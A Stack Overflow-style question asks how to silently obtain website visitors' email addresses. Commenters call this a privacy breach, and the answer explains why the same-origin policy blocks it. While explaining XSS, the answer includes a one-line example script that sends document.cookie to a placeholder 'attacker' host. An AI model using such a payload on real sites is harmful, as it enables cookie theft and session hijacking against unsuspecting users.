# script for fetching visitor E-mail id without popup

Tags: javascript, php, jquery, html, database

Need to fetch visitor Email id as soon as visitor visit the website.

without showing any popup for subscription or newsletter.

can we track down visitor email id if he/she is already logged in to any social network site/mail accounts??

There are some site doing these stuff.

Comment: its privacy breach... you should not get the details when user is not sharing it.

Comment: That's called stalking.

Comment: "There are some site doing these stuff." I'm very tempted to ask for an example. Even then, if that really were the case, you should be able to look through these sites' source code and find out for yourself. Just remember to use a sandboxed environment, you wouldn't want your privacy being violated or anything!

Comment: I know there is privacy breach and cant really disclose the names of website those are doing it..

But there can be third party apps,products or tools that we need to integrate to website ?? @Hoppeduppeanut

Answer (score 1):

In short, you cannot do that unless the website which already knows the email ID of user wishes to share it publicly.

Under Same-origin policy, web browser permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same origin. [[Wikipedia - Same-origin Policy](https://en.wikipedia.org/wiki/Same-origin_policy)]

With the help of `withCredentials` one can support cookies in cross-origin requests. Even which does not give direct access to your code. `withCredentials` indicates whether or not cross-site `Access-Control` requests should be made using credentials such as cookies, authorization headers or TLS client certificates. Setting `withCredentials` has no effect on same-site requests. [[Mozilla Dev](https://developer.mozilla.org/en-US/docs/Web/API/XMLHttpRequest/withCredentials)]

You can access same-origin cookies by injecting javascript code for Cross-site scripting (XSS). XSS is an injection attack that an attacker makes to a website which when loaded by user, the code is executed on client-side. XSS is popular for cookie hijacking, phishing or even key-logging.

Example attack:

```
<script>
    window.location='http://attacker/?cookie='+document.cookie
</script>
```

But even then, this gives you that domain's cookie when THAT domain is loaded, not when your domain is loaded.

*This answer is only for learning purposes*